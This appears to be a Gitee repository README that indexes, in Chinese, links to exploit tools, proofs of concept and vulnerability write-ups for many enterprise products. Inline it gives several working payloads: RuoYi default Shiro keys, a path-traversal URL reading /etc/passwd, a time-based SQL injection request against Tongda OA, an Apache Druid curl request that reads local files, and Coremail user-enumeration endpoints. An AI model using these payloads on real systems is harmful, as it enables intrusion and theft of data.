# FrameVul **Repository Path**: J_tonight/FrameVul ## Basic Information - **Project Name**: FrameVul - **Description**: No description available - **Primary Language**: Unknown - **License**: Not specified - **Default Branch**: main - **Homepage**: None - **GVP Project**: No ## Statistics - **Stars**: 1 - **Forks**: 0 - **Created**: 2023-11-16 - **Last Updated**: 2024-04-02 ## Categories & Tags **Categories**: Uncategorized **Tags**: None ## README # FrameVul ## 综合 - [主流供应商的一些攻击性漏洞汇总](https://github.com/r0eXpeR/supplier) - [2021_Hvv漏洞](https://github.com/hhroot/2021_Hvv) - [2022年Java应用程序的CVE漏洞](https://github.com/HackJava/CVE2022) - [漏洞库合集](https://github.com/cckuailong/vulbase) - [公开的信息、漏洞利用、脚本](https://github.com/pedrib/PoC) - [Goby POC](https://github.com/aetkrad/goby_poc) - [nuclei-templates](https://github.com/projectdiscovery/nuclei-templates) - [LiqunKit_](https://github.com/Liqunkit/LiqunKit_) - [强化fscan的漏扫POC库](https://github.com/chaosec2021/fscan-POC) - [在渗透测试中快速检测常见中间件、组件的高危漏洞。](https://github.com/1120362990/vulnerability-list) - [OAExploit一款基于产品的一键扫描工具](https://github.com/achuna33/MYExploit) - [批量扫描破解海康威视、大华等摄像头的常见漏洞。](https://github.com/WhaleFell/CameraHack) - [网络摄像头漏洞检测脚本.Nmap (Nse Nmap script engine)](https://github.com/foggyspace/NsePocsuite-lua) - [网络摄像头漏洞扫描工具 | Webcam vulnerability scanning tool](https://github.com/jorhelp/Ingram) ## 1Panel [1Panel loadfile 后台文件读取漏洞](https://peiqi.wgpsec.org/wiki/webapp/1Panel/1Panel%20loadfile%20%E5%90%8E%E5%8F%B0%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.html) ## 宝塔 [宝塔面板Windows版提权方法](https://github.com/Hzllaga/BT_Panel_Privilege_Escalation) [宝塔linux面板 <6.0 存储形xss](https://mp.weixin.qq.com/s/gtYyyhye90ZPILWCGsGKGQ) ## 辰信领创 [辰信景云终端安全管理系统 login存在 
SQL注入漏洞](https://peiqi.wgpsec.org/wiki/webapp/%E8%BE%B0%E4%BF%A1%E9%A2%86%E5%88%9B/%E8%BE%B0%E4%BF%A1%E9%A2%86%E5%88%9B%20%E8%BE%B0%E4%BF%A1%E6%99%AF%E4%BA%91%E7%BB%88%E7%AB%AF%E5%AE%89%E5%85%A8%E7%AE%A1%E7%90%86%E7%B3%BB%E7%BB%9F%20login%20SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.html) ## 钉钉 [钉钉RCE](https://github.com/crazy0x70/dingtalk-RCE) ## 亿邮电子邮件系统 [(CNVD-2021-26422)亿邮电子邮件系统 远程命令执行漏洞](https://github.com/Henry4E36/eyouRCE) ## 泛微OA [泛微OA某版本的SQL注入漏洞](https://github.com/Wrin9/weaverOA_sql_injection) [应用安全 - 软件漏洞 - 泛微OA漏洞汇总](https://www.cnblogs.com/AtesetEnginner/p/11558469.html) [泛微 e-mobile 相关漏洞](https://mp.weixin.qq.com/s/nYTXWXs-40oR41k1UsHJyw) [z1un/weaver_exp](https://github.com/z1un/weaver_exp) [关于表达式注入的小记录](https://zhuanlan.zhihu.com/p/26052235) [泛微 E-Mobile Ognl 表达式注入](https://blog.csdn.net/qq_27446553/article/details/68203308) [泛微e-cology7.1 SOAP注入引发的血案](https://www.mrwu.red/web/1598.html) [泛微协同商务系统e-cology某处SQL注入](https://www.uedbox.com/post/14232/) [泛微e-cology OA Beanshell组件远程代码执行漏洞复现](https://mp.weixin.qq.com/s/LpXiLukOKMfMSa8gUYBqNA) [ecology8_mobile_sql_inject](https://github.com/orleven/Tentacle/blob/6e1cecd52b10526c4851a26249339367101b3ca2/script/ecology/ecology8_mobile_sql_inject.py) [泛微E-Cology WorkflowServiceXml RCE](http://wiki.peiqi.tech/PeiQi_Wiki/OA产品漏洞/泛微OA/泛微E-Cology%20WorkflowServiceXml%20RCE.html?h=泛微E-Cology%20WorkflowServiceXml%20RCE) [泛微OA weaver.common.Ctrl 任意文件上传漏洞](https://mp.weixin.qq.com/s/ePYRFPfu-pvWMKSiffporA) [泛微OA 前台GetShell复现](https://ailiqun.xyz/2021/05/02/泛微OA-前台GetShell复现/) [泛微e-cology任意文件上传(已修复)](https://mp.weixin.qq.com/s/3ip7-U8BsWgq3N4SP5xd4w) [泛微e-cology另一接口任意文件上传(已修复)](https://mp.weixin.qq.com/s/nRnNyFfDQYxmFwA-7-IBVQ) [OfficeServer 文件上传](https://github.com/sobinge/2022-HW-POC/blob/main/泛微OA%20uploaderOperate.jsp%20文件上传.md) [E-office Server_v9.0 漏洞分析](https://mp.weixin.qq.com/s/JP-kIsWeQ0HZPs9jZjL24A) [某 E-Office v9 任意文件上传漏洞复现](https://www.o2oxy.cn/3860.html) 
[bigsizeme/CNVD-2021-49104](https://github.com/bigsizeme/CNVD-2021-49104) [泛微oa漏洞利用工具](https://github.com/TD0U/WeaverScan) [组合利用泛微信息泄漏漏洞和任意用户登录漏洞,可获取全部loginId并测试登录](https://github.com/A0WaQ4/Weaver_ofslogin_vul) [泛微移动管理平台E-mobile lang2sql接口存在任意文件上传](https://mp.weixin.qq.com/s?__biz=MzIxMjEzMDkyMA==&mid=2247484476&idx=1&sn=2eeef68570e6ab7d8a2789e07b8609ad) ## 帆软报表 [帆软报表v8.0 Getshell漏洞分析](http://foreversong.cn/archives/1378) [帆软报表 v8.0 任意文件读取漏洞 CNVD-2018-04757](https://mp.weixin.qq.com/s/ae8A8PGJCtr6uS11dRpzcw) [帆软 V9 getshell](https://www.o2oxy.cn/3368.html) ## 飞企互联 [飞企互联 FE业务协作平台 ShowImageServlet 任意文件读取漏洞](https://peiqi.wgpsec.org/wiki/webapp/%E9%A3%9E%E4%BC%81%E4%BA%92%E8%81%94/%E9%A3%9E%E4%BC%81%E4%BA%92%E8%81%94%20FE%E4%B8%9A%E5%8A%A1%E5%8D%8F%E4%BD%9C%E5%B9%B3%E5%8F%B0%20ShowImageServlet%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.html) ## 汉得SRM [汉得SRM tomcat.jsp 登陆绕过漏洞](https://peiqi.wgpsec.org/wiki/webapp/%E6%B1%89%E5%BE%97/%E6%B1%89%E5%BE%97SRM%20tomcat.jsp%20%E7%99%BB%E9%99%86%E7%BB%95%E8%BF%87%E6%BC%8F%E6%B4%9E.html) ## 华天动力-OA [CVE-2021-45897 全球最大CRM系统SuiteCRM远程命令执行漏洞分析与复现](https://mp.weixin.qq.com/s/KVVgiECEr7ivBfXnByi5RQ) ## 金蝶云星空 [金蝶云星空任意文件上传漏洞](https://blog.csdn.net/qq_41904294/article/details/134204734) ## 金盘 微信管理平台 [金盘 微信管理平台 getsysteminfo 未授权访问漏洞](https://peiqi.wgpsec.org/wiki/webapp/%E9%87%91%E7%9B%98/%E9%87%91%E7%9B%98%20%E5%BE%AE%E4%BF%A1%E7%AE%A1%E7%90%86%E5%B9%B3%E5%8F%B0%20getsysteminfo%20%E6%9C%AA%E6%8E%88%E6%9D%83%E8%AE%BF%E9%97%AE%E6%BC%8F%E6%B4%9E.html) ## 金山终端安全系统 [金山终端安全系统V9.0SQL注入漏洞](https://github.com/luck-ying/Library-POC/blob/40f8d4051a239ac9b49c77ea0152c394e8b38acb/%E9%87%91%E5%B1%B1%E7%BB%88%E7%AB%AF%E5%AE%89%E5%85%A8%E7%B3%BB%E7%BB%9F/%E9%87%91%E5%B1%B1%E7%BB%88%E7%AB%AF%E5%AE%89%E5%85%A8%E7%B3%BB%E7%BB%9FV9.0SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.py) ## 蓝凌OA [yuanhaiGreg/LandrayExploit](https://github.com/yuanhaiGreg/LandrayExploit) [ 蓝凌OA的前后台密码的加解密工具](https://github.com/zhutougg/LandrayDES) [蓝凌OA 
custom.jsp 任意文件读取漏洞](https://mp.weixin.qq.com/s/TkUZXKgfEOVqoHKBr3kNdw) [蓝某OA前台SSRF进一步利用到RCE](https://mp.weixin.qq.com/s/fNovp4mbKIMkVdF2ywcQcQ) [蓝凌 OA treexml.tmpl script 远程代码执行漏洞](https://github.com/tangxiaofeng7/Landray-OA-Treexml-Rce) [蓝凌EIS saveIm文件上传](https://github.com/MzzdToT/HAC_Bored_Writing/blob/main/Fileupload/%E8%93%9D%E5%87%8CEIS/EIS_upload.py) ## 联软准入系统 [联软准入系统任意文件上传](https://www.hedysx.com/2627.html) ## 绿盟 NF下一代防火墙 [绿盟 NF下一代防火墙 任意文件上传漏洞](https://peiqi.wgpsec.org/wiki/webapp/%E7%BB%BF%E7%9B%9F/%E7%BB%BF%E7%9B%9F%20NF%E4%B8%8B%E4%B8%80%E4%BB%A3%E9%98%B2%E7%81%AB%E5%A2%99%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E.html) ## 企望制造 ERP [企望制造 ERP comboxstore.action 远程命令执行漏洞](https://peiqi.wgpsec.org/wiki/webapp/%E4%BC%81%E6%9C%9B/%E4%BC%81%E6%9C%9B%E5%88%B6%E9%80%A0%20ERP%20comboxstore.action%20%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E.html) ## 锐捷 [锐捷 NBR 路由器 fileupload.php 任意文件上传漏洞](https://peiqi.wgpsec.org/wiki/iot/%E9%94%90%E6%8D%B7/%E9%94%90%E6%8D%B7%20NBR%20%E8%B7%AF%E7%94%B1%E5%99%A8%20fileupload.php%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E.html) [锐捷 BCR商业无线云网关 后台命令执行漏洞](https://peiqi.wgpsec.org/wiki/iot/%E9%94%90%E6%8D%B7/%E9%94%90%E6%8D%B7%20BCR%E5%95%86%E4%B8%9A%E6%97%A0%E7%BA%BF%E4%BA%91%E7%BD%91%E5%85%B3%20%E5%90%8E%E5%8F%B0%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E.html) ## 若依 默认Key ``` fCq+/xW488hMTCD+cmJ3aQ== zSyK5Kp6PZAAjlT+eeNMlg== ``` 后台任意文件读取 - RuoYi <= v4.5.0 ``` /common/download/resource?resource=/profile/../../../../etc/passwd ``` Druid 未授权访问 ``` /prod-api/druid/index.html ``` [若依后台定时任务一键利用](https://github.com/passer-W/Ruoyi-All) [Xcheck Java引擎漏洞挖掘&防护识别](https://mp.weixin.qq.com/s/FPMUVoSqc0Lsf5BQx07ADw) [记一次若依cms后台getshell](https://bkfish.gitee.io/2021/06/26/记一次若依cms后台getshell/) [用于windows反弹shell的yaml-payload](https://github.com/bkfish/yaml-payload-for-Win) [若依CMS4.6.0后台RCE](https://www.cnblogs.com/r00tuser/p/14693462.html) 
[若依CMS后台getshell](http://www.yongsheng.site/2021/08/31/若依CMS后台getshell/) ## 深信服 Sangfor [深信服 应用交付管理系统 login 远程命令执行漏洞](https://peiqi.wgpsec.org/wiki/webapp/%E6%B7%B1%E4%BF%A1%E6%9C%8D/%E6%B7%B1%E4%BF%A1%E6%9C%8D%20%E5%BA%94%E7%94%A8%E4%BA%A4%E4%BB%98%E7%AE%A1%E7%90%86%E7%B3%BB%E7%BB%9F%20login%20%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E.html) ## 通达OA [通达OA多处SQL注入漏洞](https://mp.weixin.qq.com/s/DcwDz11f6g7uguuBGsin7A) [OA-HUNTER/TongDa-OA](https://github.com/OA-HUNTER/TongDa-OA) [ 通达OA综合利用工具](https://github.com/xinyu2428/TDOA_RCE) [python编写的多个通达常见漏洞exp](https://github.com/kitezzzGrim/tongda-exp) [通达OA V11.5电子邮箱接口SQL注入复现](https://mp.weixin.qq.com/s/3JtV-oVGIyzy9ly6n4fMiA) [通达OA任意文件上传和文件包含漏洞导致RCE详细代码审计分析及Poc构造复现](https://www.freebuf.com/column/230871.html) [jas502n/OA-tongda-RCE](https://github.com/jas502n/OA-tongda-RCE) [通达OA11.6 preauth RCE 0day分析](https://drivertom.blogspot.com/2020/08/oa116-preauth-rce-0day.html) [poc_and_exp/rce.py](https://github.com/TomAPU/poc_and_exp/blob/master/rce.py) [通达OA v11.7后台SQL注入到RCE 0day](https://mp.weixin.qq.com/s/rtX9mJkPHd9njvM_PIrK_Q) [通达OA v11.7 在线用户登录漏洞](https://mp.weixin.qq.com/s/llyGEBRo0t-C7xOLMDYfFQ) [通达OA11.7 利用新思路(附EXP)](https://mp.weixin.qq.com/s/LJRI04VViL4hbt6dbmGHAw) [通达OA 后台getshell 新思路](https://www.o2oxy.cn/2738.html) [通达 OA 11.7 组合拳 RCE 利用分析](https://sec-in.com/article/921) [通达OA v11.8 存储型XSS 与 命令执行](https://www.tooltool.net/2710355.html) [通达 OA 代码审计篇二 :11.8 后台 Getshell](https://paper.seebug.org/1499/) [通达oa 11.8 后台getshell](https://github.com/z1un/TongdaOA-exp) [通达OA-V11.8-api-ali.php文件上传漏洞](https://www.cnblogs.com/hmesed/p/16195551.html) 通达OA v11.9 upsharestatus 后台SQL注入漏洞 ``` POST /general/appbuilder/web/portal/workbench/upsharestatus HTTP/1.1 Content-Type: application/x-www-form-urlencoded uid=15&status=1&id=1;select sleep(4) ``` [某知名OA高版本getshell思路(附部分脚本)](https://mp.weixin.qq.com/s/HU-KxA75PR3u47QOqKWktQ) [通达OA v11.10 sql注入漏洞复现](https://www.yulate.com/303.html) ## 网神 [网神 SecGate 
3600 防火墙 obj_app_upfile 任意文件上传漏洞 ](https://peiqi.wgpsec.org/wiki/iot/%E5%A5%87%E5%AE%89%E4%BF%A1/%E7%BD%91%E7%A5%9E%20SecGate%203600%20%E9%98%B2%E7%81%AB%E5%A2%99%20obj_app_upfile%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E.html) ## 网御 ACM上网行为管理系统 [网御 ACM上网行为管理系统 bottomframe.cgi SQL注入漏洞](https://peiqi.wgpsec.org/wiki/iot/%E5%A5%87%E5%AE%89%E4%BF%A1/%E7%BD%91%E5%BE%A1%20ACM%E4%B8%8A%E7%BD%91%E8%A1%8C%E4%B8%BA%E7%AE%A1%E7%90%86%E7%B3%BB%E7%BB%9F%20bottomframe.cgi%20SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.html) ## 万户OA - [户OA smartUpload.jsp 任意文件上传漏洞](https://anpaini.com/2022/OA产品漏洞/万户OA%20smartUpload.jsp%20任意文件上传漏洞/) ## 信呼 OA [信呼OA存储型XSS 0day复现](https://xz.aliyun.com/t/7887) ## 用友NC [用友nc数据库密码解密](https://github.com/jas502n/ncDecode) [kezibei/yongyou_nc_poc](https://github.com/kezibei/yongyou_nc_poc) [用友GRP-U8行政事业财务管理软件 SQL注入 CNNVD-201610-923](http://wiki.peiqi.tech/PeiQi_Wiki/OA产品漏洞/用友OA/用友GRP-U8行政事业财务管理软件 SQL注入 CNNVD-201610-923.html) [用友NC反序列化漏洞简单记录(DeleteServlet、XbrlPersistenceServlet等)](https://www.jianshu.com/p/14449a6edd05) [用友 NC XbrlPersistenceServlet反序列化](http://wiki.peiqi.tech/PeiQi_Wiki/OA产品漏洞/用友OA/用友 NC XbrlPersistenceServlet反序列化.html) [某C 1day 反序列化漏洞的武器级利用](https://mp.weixin.qq.com/s/IdXYbjNVGVIasuwQH48Q1w) [用友NC任意文件上传漏洞复现](https://www.adminxe.com/2075.html) [用友nc 反序列化回显构造思路](https://zhzhdoai.github.io/2020/09/17/某NC-反序列化回显构造/) [用友NC反序列化 简单分析](https://blog.sari3l.com/posts/608d18f0/) [CNVD-2022-60632 畅捷通任意文件上传漏洞复现](https://www.o2oxy.cn/4104.html) [用友 NC Cloud jsinvoke 任意文件上传漏洞](https://peiqi.wgpsec.org/wiki/oa/%E7%94%A8%E5%8F%8BOA/%E7%94%A8%E5%8F%8B%20NC%20Cloud%20jsinvoke%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E.html) [用友 移动管理系统 uploadApk.do 任意文件上传漏洞](https://peiqi.wgpsec.org/wiki/oa/%E7%94%A8%E5%8F%8BOA/%E7%94%A8%E5%8F%8B%20%E7%A7%BB%E5%8A%A8%E7%AE%A1%E7%90%86%E7%B3%BB%E7%BB%9F%20uploadApk.do%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E.html) [用友 U8 
CRM客户关系管理系统 getemaildata.php 任意文件读取漏洞](https://peiqi.wgpsec.org/wiki/oa/%E7%94%A8%E5%8F%8BOA/%E7%94%A8%E5%8F%8B%20U8%20CRM%E5%AE%A2%E6%88%B7%E5%85%B3%E7%B3%BB%E7%AE%A1%E7%90%86%E7%B3%BB%E7%BB%9F%20getemaildata.php%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.html) [用友 U8 CRM客户关系管理系统 getemaildata.php 任意文件上传漏洞](https://peiqi.wgpsec.org/wiki/oa/%E7%94%A8%E5%8F%8BOA/%E7%94%A8%E5%8F%8B%20U8%20CRM%E5%AE%A2%E6%88%B7%E5%85%B3%E7%B3%BB%E7%AE%A1%E7%90%86%E7%B3%BB%E7%BB%9F%20getemaildata.php%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E.html) ## 致远OA [致远OA管理员密码的重置](https://blog.csdn.net/qq_33064191/article/details/119921106) [数据库Pass解密](https://github.com/Rvn0xsy/PassDecode-jar) [Seeyon A8 登录hash破解案例](https://www.hedysx.com/2807.html) [Summer177/seeyon_exp](https://github.com/Summer177/seeyon_exp) [nex121/SeeyonEXP](https://github.com/nex121/SeeyonEXP) [致远OA帆软报表组件反射型XSS&SSRF漏洞](https://landgrey.me/blog/7/) [致远OA帆软报表组件前台XXE漏洞挖掘过程](https://landgrey.me/blog/8/) [致远A8协同办公系统poc/seeyon 0day](https://www.jianshu.com/p/562f45edde2d) [致远 OA A8 htmlofficeservlet getshell (POC&EXP)](http://wyb0.com/posts/2019/seeyon-htmlofficeservlet-getshell/) [致远OA任意管理员登陆漏洞分析](https://mp.weixin.qq.com/s/tWKCgmptOsouOllDSXBTiw) [致远OA ajax.do登录绕过任意文件上传](https://mp.weixin.qq.com/s/dk6aZY2fuJ_08tSOOh1Vzw) [致远OA ajaxAction formulaManager 文件上传漏洞](https://mp.weixin.qq.com/s/ZyPwCytO7NLUuo9rfKtgyQ) [致远OA fastjson远程代码执行漏洞复现](https://mp.weixin.qq.com/s/a1KbLlb7ZOXfeXUyhLhpMw) [致远伪0day_FastJson利用链](https://mp.weixin.qq.com/s/yTuQLqqvikwo1KfK-zGBBA) [致远 OA FastJson rce 回显](https://96.mk/2021/07/10/19.html) [致远oa xxe getshell分析(附脚本)](https://mp.weixin.qq.com/s/efuMlGrjYsUjP7nP3W2F4w) ## 浙大恩特客户资源管理系统 [浙大恩特客户资源管理系统fileupload.jsp文件上传](https://mp.weixin.qq.com/s/8BpPzi_7SfJWEQG5N988Mg) ## 74CMS [骑士 CMS 6.0.48以下文件包含getshell](https://mp.weixin.qq.com/s/erBzIapx1bz8f1ArWwwBwQ) ## Adminer [Adminer≤4.6.2任意文件读取漏洞](https://mp.weixin.qq.com/s/ZYGN8WceT2L-P4yF6Z8gyQ) 
## Apache [利用最新Apache解析漏洞(CVE-2017-15715)绕过上传黑名单](https://www.leavesongs.com/PENETRATION/apache-cve-2017-15715-vulnerability.html) [Apache HTTPD 换行解析漏洞(CVE-2017-15715)](https://vulhub.org/#/environments/httpd/CVE-2017-15715/) [Apache SSI 远程命令执行漏洞](https://vulhub.org/#/environments/httpd/ssi-rce/) [Apache 提权漏洞(CVE-2019-0211)复现](https://paper.seebug.org/889/) [【最新漏洞预警】CVE-2021-40438-Apache httpd mod_proxy SSRF漏洞深入分析与复现](https://mp.weixin.qq.com/s/tYM6z9S1WZjPjfCt2MHOAQ) [Apache mod_proxy SSRF(CVE-2021-40438)的一点分析和延伸](https://mp.weixin.qq.com/s/sbFs7kZ8tExwZPeUvq1hJw) [CVE-2021-41773 | CVE-2021-42013 漏洞利用工具 (Apache/2.4.49-2.4.50)](https://github.com/CalfCrusher/Path-traversal-RCE-Apache-2.4.49-2.4.50-Exploit) [Apache任意文件读取补丁绕过(CVE-2021-42013)](https://mp.weixin.qq.com/s/UzKu4mze02umEhxJAJpp9g) [Apache2.4.50 CVE-2021-41773 cve-2021-42013 复现](https://www.o2oxy.cn/3740.html) ## Apache ActiveMQ [ActiveMQ系列漏洞汇总复现](https://mp.weixin.qq.com/s/5U7v22q2WeLmCnkq7mfr8w) [ActiveMQ 反序列化漏洞 (CVE-2015-5254)](https://github.com/vulhub/vulhub/blob/master/activemq/CVE-2015-5254/README.zh-cn.md) [ActiveMQ任意文件写入漏洞 (CVE-2016-3088)](https://github.com/vulhub/vulhub/blob/master/activemq/CVE-2016-3088/README.zh-cn.md) [ActiveMQ RCE](https://github.com/trganda/ActiveMQ-RCE) ## Apache Airflow [Mr-xn/CVE-2022-40127](https://github.com/Mr-xn/CVE-2022-40127) ## Apache APISIX [CVE-2022-24112 Apache APISIX apisix/batch-requests RCE](https://github.com/Mr-xn/CVE-2022-24112/blob/main/CVE-2022-24112.yaml) [Apisix dashboard未授权访问到rce,含发现poc思路&复现环境](https://mp.weixin.qq.com/s/knTotxOeFlzcxvoQYSljCQ) ## Apache Axis [Apache Axis1 与 Axis2 WebService 的漏洞利用总结](https://paper.seebug.org/1489/#2-apache-axis2) [axis 1.4 AdminService未授权访问 jndi注入利用](https://jianfensec.com/渗透测试/axis 1.4 AdminService未授权访问 jndi注入命令执行利用/) [KibodWapon/Axis-1.4-RCE-Poc](https://github.com/KibodWapon/Axis-1.4-RCE-Poc) [【漏洞复现】Axis2默认弱口令后台Getshell](https://mp.weixin.qq.com/s/Gp_FMM-n472wYTBA5lC3lw) ## Apache Druid [Apache Druid 
漏洞总结](https://mp.weixin.qq.com/s/ZT5j9clfENsEWMSKuKkw1g) [Druid未授权(弱口令)的一些利用方式](https://www.cnblogs.com/cwkiller/p/12483223.html) [Druid未授权漏洞实战利用](https://www.t00ls.net/articles-62541.html) [yuyan-sec/druid_sessions](https://github.com/yuyan-sec/druid_sessions) [Apache Druid 远程代码执行漏洞 CVE-2021-25646](http://wiki.peiqi.tech/PeiQi_Wiki/Web服务器漏洞/Apache/Apache Druid/Apache Druid 远程代码执行漏洞 CVE-2021-25646.html) [漏洞复现: Apache Druid 远程代码执行漏洞 (CVE-2021-25646)](https://paper.seebug.org/1476/) [Apache Druid CVE-2021-26919 漏洞分析](http://m0d9.me/2021/04/21/Apache-Druid-CVE-2021-26919-漏洞分析/) CVE-2021-36749 ```sh curl http://127.0.0.1:8888/druid/indexer/v1/sampler?for=connect -H "Content-Type:application/json" -X POST -d "{\"type\":\"index\",\"spec\":{\"type\":\"index\",\"ioConfig\":{\"type\":\"index\",\"firehose\":{\"type\":\"http\",\"uris\":[\" file:///etc/passwd \"]}},\"dataSchema\":{\"dataSource\":\"sample\",\"parser\":{\"type\":\"string\", \"parseSpec\":{\"format\":\"regex\",\"pattern\":\"(.*)\",\"columns\":[\"a\"],\"dimensionsSpec\":{},\"timestampSpec\":{\"column\":\"no_ such_ column\",\"missingValue\":\"2010-01-01T00:00:00Z\"}}}}},\"samplerConfig\":{\"numRows\":500,\"timeoutMs\":15000}}" ``` ## Apache Dubbo [Apache Dubbo (CVE-2023-23638)漏洞利用的工程化实践](https://github.com/YYHYlh/Apache-Dubbo-CVE-2023-23638-exp) ## Apache Flink [CVE-2020-17518&17519:Flink两个漏洞复现](https://mp.weixin.qq.com/s/9xLQ1YAWVtHBv9qVk-Xc1A) [漏洞复现|Apache Flink(CVE-2020-17519)漏洞分析](https://mp.weixin.qq.com/s/6Z7ilX_bwSBU8EWfStAc5w) ## Apache Kylin [CVE-2021-45456 apache kylin命令执行](https://github.com/Awrrays/Awrrays-Team-VulLab/blob/main/Middleware/apache/Apache Kylin/CVE-2021-45456.md) ## Apache Solr [Solr RCE 整理](https://github.com/Imanfeng/Apache-Solr-RCE) [Apache Solr 注入研究](https://github.com/veracode-research/solr-injection) [Apache solr XML 实体注入漏洞 (CVE-2017-12629)](https://vulhub.org/#/environments/solr/CVE-2017-12629-XXE/) [Apache Solr 远程命令执行漏洞 
(CVE-2017-12629)](https://vulhub.org/#/environments/solr/CVE-2017-12629-RCE/) https://github.com/mpgn/CVE-2019-0192/ [Apache Solr 远程命令执行漏洞 (CVE-2019-0193)](https://vulhub.org/#/environments/solr/CVE-2019-0193/) [Apache Solr DataImportHandler 远程代码执行漏洞(CVE-2019-0193) 分析](https://paper.seebug.org/1009/) [jas502n/CVE-2019-0193](https://github.com/jas502n/CVE-2019-0193) [Apache Solr不安全配置远程代码执行漏洞复现及jmx rmi利用分析](https://mp.weixin.qq.com/s/P626BC3-JcBc3ewdlslO2w) [jas502n/CVE-2019-12409](https://github.com/jas502n/CVE-2019-12409) [Apache Solr最新漏洞复现](https://xz.aliyun.com/t/6679) [Microsoft Apache Solr RCE Velocity Template | Bug Bounty POC](https://blog.securitybreached.org/2020/03/31/microsoft-rce-bugbounty/) [Apache Solr Velocity RCE 真的getshell了吗?](https://www.hayasec.me/2019/11/06/apache-solr-velocity-rce-getshell/) [Solr 模板注入漏洞图形化一键检测工具](https://github.com/SDNDTeam/CVE-2019-17558_Solr_Vul_Tool) [CVE-2020-13957:Apche Solr 未授权上传漏洞复现](https://mp.weixin.qq.com/s/EbNK_PQZwgR6K31HwjAVRQ) [CVE-2020-13957 Apache Solr 未授权上传漏洞](https://mp.weixin.qq.com/s/5iwk08z3oP9Tim5ETBIBBg) [CVE-2020-13957:Apache Solr 未授权上传漏洞复现](https://mp.weixin.qq.com/s/1I-EwYWMnlsLsVf67F3G1w) [Solr任意文件读取漏洞环境搭建和复现](https://mp.weixin.qq.com/s/1AYen3qZMhiiym_wJh5lzw) [Apache Solr<= 8.8.2 (最新) 任意文件删除](https://mp.weixin.qq.com/s/dECH74n5qjrWT9lok8IkPQ) [Henry4E36/Solr-SSRF](https://github.com/Henry4E36/Solr-SSRF) ## Apache SuperSet [CVE-2023-27524 的基本 PoC:Apache Superset 中的不安全默认配置](https://github.com/horizon3ai/CVE-2023-27524) ## Big-IP [BIG-IP iCONTROL REST AUTH BYPASS RCE POC CVE-2022-1388](https://github.com/TomArni680/CVE-2022-1388-POC) ## Coremail 版本信息 ``` /coremail/s/json?func=verify ``` 爆破用户名 ``` /coremail/s?func=user:getLocaleUserName { "email":"zhangsan" "defaultURL":"1" } ``` [导出coremail通讯录](https://github.com/newcodor/coremail_address_list_export) [Coremail漏洞](https://github.com/HackJava/HackCoremail) [Coremail邮件系统组织通讯录一键导出](https://github.com/dpu/coremail-address-book) [Coremail nday 
任意密码修改复现](https://mp.weixin.qq.com/s/YZwMvWiqVNh5Locf-eBCVw) [yuxiaoyou123/coremail-exp](https://github.com/yuxiaoyou123/coremail-exp) [coremail漏洞之我见(碎碎念)](https://mp.weixin.qq.com/s/q6VUmRxBPLKT35qPHr4gSw) [jimoyong/CoreMailUploadRce](https://github.com/jimoyong/CoreMailUploadRce) ## Confluence [Confluence未授权添加管理员用户(CVE-2023-22515)漏洞利用工具](https://github.com/ad-calcium/CVE-2023-22515) [CVE-2022-26134 概念证明](https://github.com/jbaines-r7/through_the_wire) [CVE-2022-26134-Godzilla-MEMSHELL](https://github.com/BeichenDream/CVE-2022-26134-Godzilla-MEMSHELL) [Confluence 文件读取漏洞(CVE-2019-3394)分析](https://paper.seebug.org/1025/) [Confluence 未授权 RCE (CVE-2019-3396) 漏洞分析](https://paper.seebug.org/884/) [Yt1g3r/CVE-2019-3396_EXP](https://github.com/Yt1g3r/CVE-2019-3396_EXP) [CVE-2021-26084-Confluence命令执行 全版本内存马注入](https://mp.weixin.qq.com/s/wbIvFQmkdJH6g6ZKBFXyYQ) [alt3kx/CVE-2021-26084_PoC](https://github.com/alt3kx/CVE-2021-26084_PoC) ## DedeCMS [织梦全版本漏洞扫描工具](https://github.com/lengjibo/dedecmscan) [解决DEDECMS历史难题--找后台目录](https://xz.aliyun.com/t/2064) [Dedecms 最新版漏洞收集并复现学习](https://blog.szfszf.top/article/25/) [Chasing a Dream :: Pre-authenticated Remote Code Execution in Dedecms](https://srcincite.io/blog/2021/09/30/chasing-a-dream-pwning-the-biggest-cms-in-china.html) [DedeCMS 未授权RCE漏洞原理及影响面分析](https://mp.weixin.qq.com/s/KZ7O0JRLvk4_O1GvL5lMVw) [Dedecms GetCookie Type Juggling Authentication Bypass Vulnerability](https://srcincite.io/pocs/src-2021-0029.py.txt) ## Django [CVE-2020-7471 Django StringAgg SQL Injection漏洞复现](https://mp.weixin.qq.com/s/j4OL927w3JtL1k2hFvmffw) ## Discuz [Discuz漏洞整理.pdf](https://github.com/Awrrays/Pentest-Tips/blob/main/Discuz%E6%BC%8F%E6%B4%9E%E6%95%B4%E7%90%86.pdf) [Discuz!X 前台任意文件删除漏洞深入解析](https://xz.aliyun.com/t/34) [Discuz!因Memcached未授权访问导致的RCE](https://xz.aliyun.com/t/2018) [Discuz!X 个人账户删除漏洞](https://xz.aliyun.com/t/2297) 